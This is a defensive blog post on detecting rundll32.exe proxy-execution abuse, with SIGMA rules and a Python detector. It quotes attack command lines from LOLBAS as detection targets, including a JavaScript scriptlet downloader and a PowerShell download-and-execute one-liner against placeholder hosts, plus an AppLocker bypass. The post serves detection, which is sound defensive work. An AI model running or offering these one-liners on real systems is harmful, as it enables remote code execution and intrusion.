Detecting RunDLL32 ATT&CK Techniques

Launching an unknown binary on a target endpoint is a good way to raise alarm bells in the target organization's SOC, so attackers prefer to proxy execution through a signed Microsoft binary that is already on the box. One of the more common #LOLBINS we see is RunDLL32.exe being used to execute malicious DLL files (and, as shown below, things that are not DLLs at all). This technique is documented in MITRE's ATT&CK framework under T1085 (that ID has since been retired and the technique now lives at T1218.011, System Binary Proxy Execution: Rundll32).

In this post, we look at detection approaches for 4 variants of the technique (numbered here as sub-techniques for convenience; they are not ATT&CK's own sub-technique IDs). In each case the assumption is that you are logging process creation with command lines: Sysmon Event ID 1, or at least Security Event ID 4688 with "Include command line in process creation events" enabled in Group Policy. Without that policy setting 4688 records the process name but not the command line, and none of the logic below will fire.

Note: Credit for items #1 and #2 goes to the brilliant folks at the LOLBAS project, https://lolbas-project.github.io/.

SubTechnique 1 – Javascript ActiveX Objects

Executing a simple JavaScript downloader. Rundll32 loads mshtml and calls its RunHTMLApplication export, which interprets everything after the javascript: prefix as script, so nothing is written to disk before the remote scriptlet is fetched.
This behavior has been used by malware such as Poweliks.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")

Using Rundll32.exe to execute a JavaScript script that runs a PowerShell command, which in turn downloads and evaluates a script from a remote web site.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

Using Rundll32.exe to execute a JavaScript script that runs calc.exe. LOLBAS lists this as an AppLocker bypass: the script runs inside a Microsoft-signed binary that default rules allow, even if calc.exe is not on the allowed list.

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

Using Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the rundll32.exe process that was started, so the parent does not linger in the process list.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

SIGMA Friendly Detection Logic (the parentheses matter: AND binds tighter than OR, so without them only the first substring test is constrained to rundll32.exe and the other two match any process):

image=rundll32.exe AND (commandLine="*ActiveXObject*" OR commandLine="*WScript.Shell*" OR commandLine="*RunHTMLApplication*")

SubTechnique 2 – Alternate data streams

Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).

rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain

SIGMA Friendly Detection Logic:

image=rundll32.exe  | regex commandLine="/^rundll32.+\:.+\..+$/"

Caveat: that regex is far too broad. The drive-letter colon in any ordinary path satisfies ".+\:.+\..+", so a benign "rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL" matches too. An ADS path has a second colon after the file name (<drive>:\<path>\<file>:<stream>), so anchor on that instead, for example:

image=rundll32.exe  | regex commandLine="/rundll32.+[A-Za-z]:\\[^:"\s]+:[^"\s,]+/"

SubTechnique 3 – Point Function Call

RunDll32 can be used to launch a payload through an arbitrary export name; here the export is called PointFunctionCall. FireEye reported this command line in a suspected APT29 phishing campaign. Two things are worth noticing: the module has a .dat extension rather than .dll, which rundll32 does not care about because it simply calls LoadLibrary on whatever path it is given, and it lives in a user-writable AppData directory.

"C:\Windows\system32\rundll32.exe"  C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

SIGMA Friendly Detection Logic:

image=rundll32.exe  AND commandLine="*PointFunctionCall*"

Caveat: an export name is a trivially changed indicator, so treat this as a high-confidence, low-coverage rule. A broader companion is rundll32 loading a module whose extension is not .dll, .cpl or .ocx from a path under \Users\.

SubTechnique 4 – Network HTTP(s) call for additional payloads

Rundll32 can be used to launch a custom DLL that pulls additional content down from the internet, with the URLs passed on the command line as arguments to the DLL. The example below is from the Slimware PUA.

Rundll32.exe "C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua="(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)" -ul=https://anx.mindspark.com/anx.gif?anxa=%251&anxe=%252&anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&anxtv=2.7.1.3000&anxp=^CPW^xdm373^TTAB02^us&anxsi=&anxv=%253&anxd=2020-04-01&anxr=%254 -hu=SHOW

SIGMA Friendly Detection Logic (yourdomain.com stands for whatever first-party domains your own software legitimately passes to rundll32):

image=rundll32.exe AND (commandLine="*\users\*http*" AND NOT commandLine="*yourdomain.com*")

Caveat: the NOT clause is a substring test. An attacker who knows your allowlisted domain can append it to any argument and suppress the alert, so if your SIEM supports it, extract the URL hosts from the command line and require every one of them to be on the allowlist rather than checking for the string anywhere.
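The four rules above, implemented as a small Python detector and run over constructed process-creation events, as an added example (this is not code from the post or from LOLBAS). It folds in the corrections noted above: the parenthesised image test for rule 1, an ADS regex that requires a colon after the file name rather than the drive letter, and a host-based allowlist for rule 4 instead of a substring NOT. The sample command lines are built from the strings quoted in the post plus benign look-alikes; the user name jdoe, the ALLOWLIST contents and the "benign" examples are assumptions, not captured telemetry.

```python
"""Rundll32 command-line detections from this post, run over constructed events.

Added example (not code from the post or from LOLBAS). Sample command lines are
built from the strings quoted above plus benign look-alikes; none is real telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon EID 1 Image/CommandLine, or 4688 New Process Name/Process Command Line)."""
    image: str
    command_line: str


def is_rundll32(ev: ProcEvent) -> bool:
    """The post's `image=rundll32.exe`. A renamed copy evades this; Sysmon's OriginalFileName field would not."""
    return ev.image.lower().rsplit("\\", 1)[-1] == "rundll32.exe"


# 1. JavaScript / ActiveX abuse. All three markers sit under the image test (the
#    post's query needs parentheses, otherwise AND binds tighter than OR).
JS_MARKERS = ("activexobject", "wscript.shell", "runhtmlapplication")


def rule_js_activex(ev: ProcEvent) -> bool:
    cl = ev.command_line.lower()
    return is_rundll32(ev) and any(m in cl for m in JS_MARKERS)


# 2. DLL loaded from an Alternate Data Stream. The post's `^rundll32.+\:.+\..+$` also
#    matches the drive-letter colon of any ordinary path, so this requires a second
#    colon after the file name: <drive>:\<path>:<stream>
ADS_RE = re.compile(r'(?i)rundll32(?:\.exe)?"?\s+"?[a-z]:\\[^"\s:,]+:[^"\s,]+')


def rule_ads(ev: ProcEvent) -> bool:
    return is_rundll32(ev) and ADS_RE.search(ev.command_line) is not None


# 3. The export name FireEye reported for the suspected APT29 sample. Export names
#    are trivially changed, so this is a high-confidence, low-coverage indicator.
def rule_pointfunctioncall(ev: ProcEvent) -> bool:
    return is_rundll32(ev) and "pointfunctioncall" in ev.command_line.lower()


# 4. Module under a user profile handed an http(s) URL, minus first-party domains.
#    ALLOWLIST is a placeholder (assumption), like `yourdomain.com` in the post.
ALLOWLIST = {"yourdomain.com"}
USER_HTTP_RE = re.compile(r"(?i)\\users\\.*https?://")
HOST_RE = re.compile(r"(?i)https?://([a-z0-9.-]+)")


def _allowlisted(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWLIST)


def rule_user_profile_http(ev: ProcEvent) -> bool:
    if not (is_rundll32(ev) and USER_HTTP_RE.search(ev.command_line)):
        return False
    # The post's `NOT commandLine=*yourdomain.com*` is a substring test an attacker satisfies
    # by appending that string to any argument; here every URL host must be allowlisted instead.
    hosts = HOST_RE.findall(ev.command_line)
    return not hosts or not all(_allowlisted(h) for h in hosts)


RULES = {
    "rundll32_js_activex": rule_js_activex,
    "rundll32_ads_dll": rule_ads,
    "rundll32_pointfunctioncall": rule_pointfunctioncall,
    "rundll32_userprofile_http": rule_user_profile_http,
}


def detect(ev: ProcEvent) -> list[str]:
    """Names of the rules that fire for one event, in RULES order."""
    return [name for name, rule in RULES.items() if rule(ev)]


def run_detections(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    return [(ev.command_line, detect(ev)) for ev in events]


RUNDLL32 = r"C:\Windows\System32\rundll32.exe"
SAMPLE_EVENTS = [  # constructed for this example, not captured from a host
    ProcEvent(RUNDLL32, r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc")'),
    ProcEvent(RUNDLL32, r'rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain'),
    ProcEvent(RUNDLL32, r'"C:\Windows\system32\rundll32.exe"  C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall'),
    ProcEvent(RUNDLL32, r'Rundll32.exe "C:\Users\jdoe\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/onlineformfinder/index.html -hu=SHOW'),
    ProcEvent(RUNDLL32, r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'),  # benign: drive colon only
    ProcEvent(RUNDLL32, r'rundll32.exe "C:\Users\jdoe\AppData\Local\Vendor\updater.dll",Check https://updates.yourdomain.com/ping'),  # benign: allowlisted host
    ProcEvent(r"C:\Windows\System32\cscript.exe", r'cscript.exe //nologo C:\build\tasks.js ActiveXObject'),  # benign: not rundll32
]

if __name__ == "__main__":
    for cmd, hits in run_detections(SAMPLE_EVENTS):
        print(f"{', '.join(hits) or '-':30} {cmd[:80]}")
```

Running the script prints one line per sample: the four malicious command lines each trip exactly one rule, and the three benign look-alikes trip none, including the shell32.dll one that the post's original ADS regex would have flagged.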

References:

– https://lolbas-project.github.io/lolbas/Binaries/Rundll32
– https://attack.mitre.org/techniques/T1085/
– https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
